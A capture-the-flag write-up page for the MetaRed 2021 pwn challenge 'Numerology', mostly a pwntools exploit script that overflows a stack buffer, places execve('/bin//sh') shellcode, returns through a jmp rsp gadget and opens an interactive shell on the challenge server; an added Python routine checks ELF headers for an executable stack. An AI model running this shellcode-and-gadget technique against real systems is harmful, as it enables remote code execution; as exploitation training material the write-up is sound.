CTF Int. MetaRed 2021 - 3rd STAGE / PWN

Numerology


Last updated 3 years ago

Strategy

Exploit

#!/usr/bin/env python3

from pwn import *

exe = ELF("./numerology")
context.log_level = 'info'
args.LOCAL = False   # set to True to run the binary locally instead of the remote service
args.DEBUG = True    # attach gdb when running locally
context.binary = exe


def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r, gdbscript="")
    else:
        r = remote("143.255.251.233", 13373)

    return r


def main():
    # 0x000000000040119e : jmp rsp  -> ROP to JMP RSP to execute our shellcode
    offjmp4 = 0x72  # offset of the backward JMP from our stack position to the shellcode
    shell = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'  # shellcode

    offset = 36 - len(shell)  # 36 is our overflow, so 36 - len(shell) bytes of padding go in front

    r = conn()

    # padding + shellcode fill the overflow, the return address is overwritten with the
    # jmp rsp gadget, and the bytes right after it (where rsp points after ret) hold a
    # jmp back into the shellcode
    r.sendline(b'A'*offset + shell + p64(0x000000000040119e) + asm('jmp $-' + hex(offjmp4)))

    r.interactive()


if __name__ == "__main__":
    main()
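The payload above relies on the stack being executable: `jmp rsp` lands on shellcode stored in the overflowed stack buffer, which NX would stop. As an added example (not part of the writeup), here is a minimal parser that reads the PT_GNU_STACK program header of an ELF64 image, the flag behind the "NX" line of `checksec`; the images built by `make_test_elf` are constructed stand-ins, not the challenge binary.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551  # program-header type that records the stack permissions
PF_X = 0x1                 # "executable" bit in p_flags


def stack_is_executable(elf: bytes) -> bool:
    """True if code placed on the stack of this ELF64 image could run.

    Loader rule: with a PT_GNU_STACK header present, the stack is executable
    only if PF_X is set in p_flags; without the header the legacy default is an
    executable stack (which is why an absent header is also reported as True).
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 2:  # e_ident: magic, then 2 = ELFCLASS64
        raise ValueError("not an ELF64 image")
    e_phoff = struct.unpack_from("<Q", elf, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True


def make_test_elf(stack_flags):
    """Constructed ELF64 header plus one PT_GNU_STACK program header.

    Not a runnable binary, just enough structure for the parser above.
    stack_flags=None omits the PT_GNU_STACK header entirely.
    """
    phnum = 0 if stack_flags is None else 1
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # 16-byte e_ident
    # e_type=ET_DYN, e_machine=x86-64, e_version, e_entry, e_phoff=64, e_shoff,
    # e_flags, e_ehsize=64, e_phentsize=56, e_phnum, e_shentsize, e_shnum, e_shstrndx
    ehdr += struct.pack("<HHIQQQIHHHHHH", 3, 62, 1, 0, 64, 0, 0, 64, 56, phnum, 64, 0, 0)
    phdr = b""
    if phnum:
        # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
        phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr


if __name__ == "__main__":
    for path in sys.argv[1:]:  # e.g. python3 nxcheck.py ./numerology
        with open(path, "rb") as f:
            print(path, "executable stack:", stack_is_executable(f.read()))
```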